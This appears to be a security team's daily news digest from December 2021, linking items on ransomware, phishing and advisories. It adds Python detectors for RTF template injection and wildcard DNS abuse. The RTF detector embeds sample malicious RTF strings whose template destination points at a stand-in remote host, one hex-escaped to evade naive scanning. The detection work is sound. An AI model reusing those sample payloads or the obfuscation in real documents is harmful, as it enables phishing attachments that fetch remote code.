Daily Summary - 01.12.2021

End-of-Day report

Timeframe: Tuesday 30-11-2021 18:00 - Wednesday 01-12-2021 18:00 Handler: Wolfgang Menezes Co-Handler: Thomas Pribitzer

News

Microsoft Exchange servers hacked to deploy BlackByte ransomware

BlackByte ransomware actors were observed exploiting the ProxyShell set of vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to compromise Microsoft Exchange servers.

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/


Info-Stealer Using webhook.site to Exfiltrate Data, (Wed, Dec 1st)

We already reported multiple times that, when you offer an online (cloud) service, there is a good chance that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through webhook.site.

https://isc.sans.edu/diary/rss/28088


Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors

RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file.

https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
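The RTF destination Proofpoint describes is a `{\*\template ...}` group whose text is a remote URL instead of a local template path; Word fetches that URL when the file is opened. The scanner below is an added example (not code from Proofpoint or from this digest) that pulls the template destination out of an RTF file, resolves RTF `\'hh` hex and `\uN` Unicode escapes in case the URL is obfuscated, and reports any remote URL or UNC path it finds. The sample documents and the `example.invalid` host are constructed for this example; treating escape-encoded URLs as an obfuscation variant is an assumption, not something stated on this page.

```python
import re

# Constructed samples written for this example (not taken from real malware).
# The first two carry a \*\template destination pointing at a remote URL, which
# is the RTF template injection pattern; the third is an ordinary document.
RTF_PLAIN = rb"{\rtf1\ansi{\*\template http://example.invalid/inj.dotm}\pard Hello\par}"
RTF_HEX = (rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70\'3a\'2f\'2f"   # "http://" as \'hh escapes
           rb"example.invalid/inj.dotm}\pard Hello\par}")
RTF_BENIGN = rb"{\rtf1\ansi\pard Quarterly report\par}"

HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")          # \'68  -> 0x68
UNICODE_ESCAPE = re.compile(rb"\\u(-?\d+)\??")            # \u104? -> "h" (fallback char dropped)
TEMPLATE_DEST = re.compile(rb"\{\\\*\\template\b([^{}]*)\}")
CONTROL_WORD = re.compile(rb"\\[a-zA-Z]+-?\d* ?")         # any remaining control word
URL_LIKE = re.compile(r"(?i)^(?:https?|ftp|file)://|^\\\\")  # scheme or UNC path


def decode_rtf_text(data: bytes) -> bytes:
    """Resolve \\'hh hex escapes and \\uN Unicode escapes into raw text bytes."""
    data = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

    def uni(m):
        code = int(m.group(1))
        if code < 0:               # RTF writes code points above 32767 as negative numbers
            code += 65536
        return chr(code).encode("utf-8", "replace")

    return UNICODE_ESCAPE.sub(uni, data)


def find_template_urls(rtf: bytes) -> list:
    """Return remote locations found in \\*\\template destinations (empty list if none).

    A template destination by itself is legitimate RTF; the indicator is a
    remote URL or UNC path where a local template name would normally sit.
    """
    found = []
    for m in TEMPLATE_DEST.finditer(rtf):
        body = decode_rtf_text(m.group(1))          # de-obfuscate before stripping control words
        text = CONTROL_WORD.sub(b"", body).strip().decode("latin-1")
        if URL_LIKE.match(text):
            found.append(text)
    return found


def scan_file(path: str) -> list:
    """Convenience wrapper for use on real attachments."""
    with open(path, "rb") as fh:
        return find_template_urls(fh.read())


if __name__ == "__main__":
    for label, doc in (("plain", RTF_PLAIN), ("hex", RTF_HEX), ("benign", RTF_BENIGN)):
        print(label, find_template_urls(doc))
```

Run it against a quarantined attachment with `scan_file(path)`; a non-empty result is worth a detonation or a block on the referenced host. The hex and Unicode decoding is what keeps a naive `grep -a template` from being defeated by escape-encoded URLs.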


l+f: Emotet false alarm from Microsoft Defender

Microsoft's antivirus needlessly alarmed users and administrators: a faulty detection update saw Emotet infections where there were none.

https://heise.de/-6280766


Tracking a P2P network related with TA505

For the past few months, NCC Group has been tracking very closely the operations of TA505 and the development of different projects (e.g. Clop) by them.

https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/


Vulnerability Spotlight: Use-after-free condition in Google Chrome could lead to code execution

Cisco Talos recently discovered an exploitable use-after-free vulnerability in Google Chrome.

http://blog.talosintelligence.com/2021/12/vuln-spotlight-chrome-.html


E-mail "Ihr Paket ist in der Warteschleife" ("Your parcel is on hold") is fake

Are you currently waiting for a parcel? Then beware of e-mails with the subject "Ihr Paket ist in der Warteschleife". Criminals pose as DHL and claim that customs fees are outstanding.

https://www.watchlist-internet.at/news/e-mail-ihr-paket-ist-in-der-warteschleife-ist-fake/


Play Your Cards Right: Detecting Wildcard DNS Abuse

Wildcard DNS records can be used constructively, but their flexibility also provides attackers with a variety of options for executing attacks.

https://unit42.paloaltonetworks.com/wildcard-dns-abuse/
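Because a wildcard record answers for any label under a zone, an attacker can mint unlimited throwaway hostnames (one per victim or per campaign) that all land on the same server, and the same property makes the abuse visible: many distinct hostnames under one domain collapsing onto a single answer. The snippet below is an added example, not code from Unit 42 or from this digest, showing both a passive check over DNS log records and an active probe that resolves random labels. The log lines, the `shop-good.example` / `track-bad.example` zones and the `fake_resolve` stand-in resolver are constructed for offline use; grouping by the last two labels instead of the Public Suffix List is a simplifying assumption.

```python
import secrets
from collections import defaultdict

# Constructed passive-DNS style records (timestamp, name, type, answer) written
# for this example; not real traffic.
SAMPLE_LOG = """\
2021-12-01T10:00:01Z www.shop-good.example A 203.0.113.10
2021-12-01T10:00:02Z img.shop-good.example A 203.0.113.11
2021-12-01T10:00:03Z api.shop-good.example A 203.0.113.12
2021-12-01T10:00:04Z k3j9x2.track-bad.example A 198.51.100.7
2021-12-01T10:00:05Z q8w1zz.track-bad.example A 198.51.100.7
2021-12-01T10:00:06Z a0d4mn.track-bad.example A 198.51.100.7
2021-12-01T10:00:07Z p7r2ty.track-bad.example A 198.51.100.7
2021-12-01T10:00:08Z u5v6bb.track-bad.example A 198.51.100.7
2021-12-01T10:00:09Z www.news-good.example A 192.0.2.20
"""


def registered_domain(name: str) -> str:
    # Assumption: registered domain = last two labels. Production code should
    # use the Public Suffix List so host.example.co.uk is grouped correctly.
    parts = name.rstrip(".").lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else name.lower()


def parse_log(text: str) -> list:
    """Parse 'timestamp name type answer' lines, keeping A records only."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 4 and fields[2] == "A":
            records.append((fields[1].lower(), fields[3]))
    return records


def find_wildcard_candidates(records, min_labels: int = 5) -> list:
    """Passive check: flag domains where many distinct hostnames share one answer.

    A legitimate wildcard (e.g. tenant.saas.example) shows the same shape, so
    treat hits as triage candidates, not verdicts.
    """
    names, answers = defaultdict(set), defaultdict(set)
    for name, answer in records:
        dom = registered_domain(name)
        names[dom].add(name)
        answers[dom].add(answer)
    return sorted(d for d in names if len(names[d]) >= min_labels and len(answers[d]) == 1)


def probe_is_wildcard(domain: str, resolve, probes: int = 3) -> bool:
    """Active check: random labels that all resolve identically indicate a wildcard.

    `resolve(name)` returns a set of addresses or raises LookupError on NXDOMAIN.
    In production wrap socket.gethostbyname_ex or a dnspython query here.
    """
    seen = set()
    for _ in range(probes):
        label = secrets.token_hex(8)          # label nobody would have registered
        try:
            seen.add(frozenset(resolve(f"{label}.{domain}")))
        except LookupError:
            return False                      # NXDOMAIN for a random label: no wildcard
    return len(seen) == 1


# Constructed stand-in resolver: track-bad.example has a wildcard, shop-good.example does not.
_ZONE = {"www.shop-good.example": {"203.0.113.10"}}


def fake_resolve(name: str) -> set:
    if name in _ZONE:
        return _ZONE[name]
    if name.endswith(".track-bad.example"):
        return {"198.51.100.7"}
    raise LookupError(name)


if __name__ == "__main__":
    print(find_wildcard_candidates(parse_log(SAMPLE_LOG)))
    print(probe_is_wildcard("track-bad.example", fake_resolve),
          probe_is_wildcard("shop-good.example", fake_resolve))
```

The passive check is the one to run over resolver or proxy logs; the active probe confirms a candidate and distinguishes a genuine wildcard from a domain that simply hosts many real names on one address.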


Shodan Verified Vulns 2021-12-01

Overall there is little change compared to the previous month, although the number of vulnerable Microsoft Exchange servers dropped fairly noticeably - props to the administrators!

https://cert.at/de/aktuelles/2021/12/shodan-verified-vulns-2021-12-01


CISA Adds Five Known Exploited Vulnerabilities to Catalog

CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting them.

https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog


FBI document shows what data can be obtained from encrypted messaging apps

A recently discovered FBI training document shows that US law enforcement can gain limited access to the content of encrypted messages from secure messaging services like iMessage, Line, and WhatsApp, but not to messages sent via Signal, Telegram, Threema, Viber, WeChat, or Wickr.

https://therecord.media/fbi-document-shows-what-data-can-be-obtained-from-encrypted-messaging-apps/

Vulnerabilities

IBM Security Bulletins 2021-11-30

IBM QRadar SIEM, IBM Integration Bus, IBM App Connect Enterprise, IBM HTTP Server, IBM Cloud Pak for Data, IBM Watson Discovery for IBM Cloud Pak for Data, IBM Match 360, IBM SDK (Java Technology Edition), IBM WebSphere Application Server

https://www.ibm.com/blogs/psirt/


Security updates for Wednesday

Security updates have been issued by Debian (rsync, rsyslog, and uriparser), Fedora (containerd, freeipa, golang-github-containerd-ttrpc, libdxfrw, libldb, librecad, mingw-speex, moby-engine, samba, and xen), Red Hat (kernel, kernel-rt, kpatch-patch, and samba), and Ubuntu (linux, linux-aws, linux-aws-5.11, linux-azure, linux-azure-5.11, linux-gcp, linux-gcp-5.11, linux-hwe-5.11, linux-kvm, linux-oracle, linux-oracle-5.11, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-gcp, [...])

https://lwn.net/Articles/877284/


Jamf Pro management software for Apple devices could leak credentials

https://heise.de/-6281352


Security Advisory - Buffer Overflow Vulnerability in Some Huawei Products

http://www.huawei.com/en/psirt/security-advisories/2021/huawei-sa-20211201-01-buffer-en


XSS Vulnerability Patched in Plugin Designed to Enhance WooCommerce

https://www.wordfence.com/blog/2021/12/xss-vulnerability-patched-in-plugin-designed-to-enhance-woocommerce/


Mozilla Foundation Security Advisory 2021-51: Memory corruption in NSS via DER-encoded DSA and RSA-PSS signatures

https://www.mozilla.org/en-US/security/advisories/mfsa2021-51/


Mitsubishi Electric MELSEC and MELIPC Series

https://us-cert.cisa.gov/ics/advisories/icsa-21-334-02


Johnson Controls CEM Systems AC2000

https://us-cert.cisa.gov/ics/advisories/icsa-21-334-04


Hitachi Energy Retail Operations and CSB Software

https://us-cert.cisa.gov/ics/advisories/icsa-21-334-05